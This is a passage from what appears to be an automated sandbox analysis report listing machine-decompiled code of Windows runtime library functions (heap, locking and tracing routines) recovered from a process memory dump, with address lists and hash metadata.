				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E054688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E053ED130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x54886c0; // 0x32f07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x54886b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E053B2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E054688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E053DAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x548b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x54884c0;
										if(_t69 >=  *0x54884c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E05469063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0539922A(_t82);
							_t53 = E053B7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E05468B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x54886c0; // 0x32f07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x54886b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x54886bc;
										_t72 = 0x54886b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E05399240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x54886c4;
									_t72 = 0x54886c0;
									L18:
									E053C9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x05399100
0x05399100
0x05399100
0x05399100
0x05399102
0x05399107
0x0539910c
0x05399110
0x05399115
0x05399136
0x05399143
0x053f37e4
0x053f37e4
0x05399149
0x0539914e
0x0539914e
0x05399117
0x0539911d
0x00000000
0x00000000
0x0539911f
0x05399125
0x00000000
0x05399151
0x05399158
0x0539915d
0x05399161
0x05399168
0x053f3715
0x00000000
0x0539916e
0x0539916e
0x05399175
0x05399177
0x0539917e
0x0539917f
0x05399182
0x05399182
0x05399187
0x05399187
0x0539918a
0x0539918d
0x0539918f
0x05399192
0x05399195
0x05399198
0x05399198
0x05399198
0x0539919a
0x00000000
0x00000000
0x053f371f
0x053f3721
0x053f3727
0x053f372f
0x053f3733
0x053f3735
0x053f3738
0x053f373b
0x053f373d
0x053f3740
0x00000000
0x00000000
0x053f3746
0x053f3749
0x00000000
0x00000000
0x053f374f
0x053f3751
0x00000000
0x00000000
0x053f3757
0x053f3759
0x053f375c
0x053f375c
0x053f375e
0x053f375e
0x053f3761
0x053f3764
0x00000000
0x00000000
0x053f3766
0x053f3768
0x053f37a3
0x053f37a3
0x053f37a5
0x053f37a7
0x053f37ad
0x053f37b0
0x053f37b2
0x053f37bc
0x053f37c2
0x053f37c2
0x053f37b2
0x05399187
0x05399187
0x0539918a
0x0539918d
0x0539918f
0x05399192
0x05399195
0x00000000
0x05399195
0x00000000
0x05399187
0x053f376a
0x053f376a
0x053f376c
0x053f376c
0x053f376f
0x053f3775
0x00000000
0x00000000
0x053f3777
0x053f3779
0x00000000
0x00000000
0x053f3782
0x053f3787
0x053f3789
0x053f3790
0x053f3790
0x053f378b
0x053f378b
0x053f378b
0x053f3792
0x053f3795
0x053f3795
0x053f3798
0x053f3798
0x053f379b
0x053f379b
0x053991a3
0x053991a9
0x053991b0
0x053991b4
0x053991b4
0x053991bb
0x053991c0
0x053991c5
0x053991c7
0x053f37da
0x053991cd
0x053991cd
0x053991cd
0x053991d2
0x053991d5
0x05399239
0x05399239
0x053991d7
0x053991db
0x053991e1
0x053991e7
0x053991fd
0x05399203
0x0539921e
0x05399223
0x00000000
0x05399223
0x05399205
0x05399208
0x0539920c
0x05399214
0x05399214
0x053991e9
0x053991e9
0x053991ee
0x053991f3
0x053991f3
0x053991f3
0x053991e7
0x00000000
0x053991db
0x05399187
0x05399168

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 756e88c6d5456c4387ef66f67dde43556ea6783c3c0a2e1997dee7add67109a7
Instruction ID: e87005f807b23c0639b6dbef17ed8a47ac5f1c4ddcc690bd47dfb4dcfe09f6db
Opcode Fuzzy Hash: 756e88c6d5456c4387ef66f67dde43556ea6783c3c0a2e1997dee7add67109a7
Instruction Fuzzy Hash: C031C2B6A05285DFDF29DF68C488BECBBF6BB88350F18854ED40567251C3B4A980CB52

Uniqueness

Uniqueness Score: -1.00%

Function 053C1DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E053C1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E053BF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L053B4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E053BF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x053c1dc2
0x053c1dc5
0x053c1dc7
0x053c1dcc
0x053c1dce
0x053c1dd6
0x053c1ddf
0x053c1de0
0x053c1de1
0x053c1de5
0x053c1de8
0x053c1def
0x053c1df0
0x053c1df6
0x053c1df7
0x053c1dfe
0x053c1e1a
0x00000000
0x00000000
0x053c1e0b
0x053c1e12
0x053c1e12
0x053c1e00
0x053c1e00
0x053c1e05
0x053c1e1e
0x053c1e23
0x0540570f
0x05405713
0x00000000
0x00000000
0x05405719
0x05405719
0x053c1e2c
0x053c1e2d
0x053c1e2e
0x053c1e2f
0x053c1e31
0x053c1e32
0x053c1e35
0x053c1e3d
0x05405723
0x0540573d
0x0540573d
0x00000000
0x05405723
0x053c1e49
0x053c1e4e
0x053c1e4e
0x053c1e09
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 6e9dc2f6fcf8c855e6fce73c8f265a7cdff70a75d489594d922d526fb69ee81b
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 3D218172A00119FFD721CF69CC84EABBBBDFF86640F11409AE905D7611D674AE11EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 053B0050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E053B0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x548d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E053C9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E053DB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E05468A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E053C9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x548b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x053b0055
0x053b005d
0x053b0062
0x053b006c
0x053b006f
0x053b0074
0x053b007a
0x053b007a
0x053b0080
0x053b0080
0x053b0087
0x053b008d
0x053b008f
0x053b0093
0x053b0095
0x053b009b
0x053b00f8
0x053b00fb
0x053b00fc
0x053b00ff
0x053b0108
0x053b0108
0x053b00a2
0x053b00a6
0x053b00b3
0x053b00bc
0x053b00c5
0x053b00ca
0x053fc01e
0x00000000
0x00000000
0x053fc02d
0x053b00d5
0x053b00d9
0x053fc03d
0x053fc046
0x053fc046
0x053b00df
0x053b00e2
0x053b00ea
0x053b00ef
0x053b00f2
0x053b00f6
0x053b0111
0x053b0117
0x053b0117
0x00000000
0x053b00f6
0x053b00d0
0x053b00d0
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2b6de5621fa872afa64d2e15aa855107bf4acd67023bed295499954fb800239
Instruction ID: f8aea7b96de3f45b88dd95c83d4542bc21f7796c227490aedb6ec8c728a9e19a
Opcode Fuzzy Hash: d2b6de5621fa872afa64d2e15aa855107bf4acd67023bed295499954fb800239
Instruction Fuzzy Hash: AE318E31601B04CFD725CF28C848BABB7E6FF88714F14456DE59687A90EBB5AC01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05416C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E05416C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E053B7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x5487b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L053B4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E053DF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E053B7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E053D9AE0();
						_t23 = L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x05416c0a
0x05416c0f
0x05416c10
0x05416c13
0x05416c15
0x05416c19
0x05416c1c
0x05416c21
0x05416c28
0x05416c3a
0x05416c2a
0x05416c33
0x05416c33
0x05416c3f
0x05416c48
0x05416c4d
0x05416c60
0x05416c65
0x05416c69
0x05416c73
0x05416c79
0x05416c7f
0x05416c86
0x05416c90
0x05416c94
0x05416ca6
0x05416cb2
0x05416cbd
0x05416cbd
0x05416cc3
0x05416cc7
0x05416ccb
0x05416cd0
0x05416cd1
0x05416ce2
0x05416ce2
0x05416c69
0x05416ced

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c961673d19dbb4a266b6295aea09ac4193884d62798dedc2d5211976bdc408ff
Instruction ID: baca60f4bac61aed8cf5003f9ffa99d3f1fd959940216d54070de4117f2fff0e
Opcode Fuzzy Hash: c961673d19dbb4a266b6295aea09ac4193884d62798dedc2d5211976bdc408ff
Instruction Fuzzy Hash: D621D172A00644AFD715DF68D984FAAB7B8FF48740F1400AAF905C7B91E634ED10CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 053D90AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E053D90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E053ED4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E053CE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L053B4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E053DF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E053CA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x053d90af
0x053d90b8
0x053d90bb
0x053d90bf
0x053d90c2
0x053d90c2
0x053d90c8
0x053d90cb
0x053d90cd
0x054114d7
0x054114eb
0x054114eb
0x00000000
0x054114eb
0x054114db
0x054114e6
0x00000000
0x054114f2
0x054114e8
0x00000000
0x054114e8
0x053d90d8
0x053d90da
0x053d90dd
0x053d90e5
0x00000000
0x053d9139
0x053d90fa
0x053d90fe
0x053d9142
0x00000000
0x053d9142
0x053d9104
0x053d9107
0x053d910b
0x053d9110
0x053d9118
0x053d9147
0x053d9148
0x053d914f
0x053d9150
0x053d9151
0x053d9152
0x053d9156
0x053d915d
0x053d9160
0x053d9168
0x053d916c
0x053d91bc
0x053d91be
0x00000000
0x053d91be
0x053d916e
0x053d9173
0x053d9176
0x00000000
0x00000000
0x053d917c
0x053d9180
0x053d91b5
0x00000000
0x053d91b5
0x053d9182
0x053d9185
0x053d9189
0x00000000
0x00000000
0x053d918e
0x053d9190
0x053d9198
0x00000000
0x00000000
0x053d91a0
0x00000000
0x053d91ad
0x053d91ad
0x053d91b0
0x053d91b1
0x00000000
0x053d9185
0x053d911a
0x053d911c
0x053d911f
0x053d9125
0x053d9127
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 3a5713b8adac1ff3bc1ce073cffa8aa1bc4740b232314a01eb5c1d04b84767ad
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: E6219272A00205EFDB21DF59D844FAAF7F9EB48710F14886AE945A7600D370ED00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 053C3B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E053C3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x54884c4; // 0x0
				_v12 = 1;
				_v8 =  *0x54884c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x54884c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E053DAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E053DFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x54884c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x54884c4; // 0x0
					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x053c3b89
0x053c3b96
0x053c3ba1
0x053c3bab
0x053c3bb5
0x053c3bb9
0x05406298
0x053c3bbf
0x053c3bc2
0x053c3bc3
0x053c3bc9
0x053c3bca
0x053c3bcc
0x053c3bcd
0x053c3bd4
0x053c3bd6
0x053c3bdb
0x053c3bea
0x053c3bf7
0x053c3bfb
0x053c3bff
0x053c3c09
0x053c3c0a
0x053c3c0b
0x053c3c0f
0x053c3c14
0x053c3c18
0x053c3c18
0x053c3bfb
0x053c3c1b
0x053c3c30
0x053c3c30
0x053c3c3d

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b9bf44048463bc86720272455b2de43ac3b695b52d1d186fa7f89a57f8b7a7
Instruction ID: 2055662279b74645f3138cf8c897c49ed08c9b99bcadf018328d963a8f5d37ec
Opcode Fuzzy Hash: 44b9bf44048463bc86720272455b2de43ac3b695b52d1d186fa7f89a57f8b7a7
Instruction Fuzzy Hash: 6D21B072A00104AFC704DF58DD81BAEBBBEFB44708F2545A8E505AB251D771ED019BA0

Uniqueness

Uniqueness Score: -1.00%

Function 05416CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E05416CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E053B7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E053B7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x5375c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E053CF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E053CF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E05417016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L053B2400( &_v52);
								}
								_t21 = L053B2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x05416cfb
0x05416d00
0x05416d02
0x05416d06
0x05416d0a
0x05416d0e
0x05416d19
0x05416d2b
0x05416d1b
0x05416d24
0x05416d24
0x05416d33
0x05416d39
0x05416d46
0x05416d4f
0x05416d61
0x05416d51
0x05416d5a
0x05416d5a
0x05416d69
0x05416d6b
0x05416d6d
0x05416d6f
0x05416d6f
0x05416d74
0x05416d79
0x05416d7a
0x05416d7f
0x05416d82
0x05416d88
0x05416d89
0x05416d90
0x05416d94
0x05416da7
0x05416db1
0x05416db1
0x05416dbb
0x05416dbb
0x05416d90
0x05416d69
0x05416d46
0x05416dc6

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dd875899efe77f553c63af5441ce2d2f9f17e294b5453bbc60ee711ad938a55
Instruction ID: dff911ccafc3a3d9b610228eda91190e6d900d94b1a649ccd25b509042be558e
Opcode Fuzzy Hash: 6dd875899efe77f553c63af5441ce2d2f9f17e294b5453bbc60ee711ad938a55
Instruction Fuzzy Hash: B521D0726042549BD311DF29C948BEBBBECEF81680F05099BBD4087A50E734D909C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 0546070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0546070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E054607DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0545AFDE( &_v8,  &_v12);
					E05461293(_t38, _v28, _t60);
					if(E053B7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
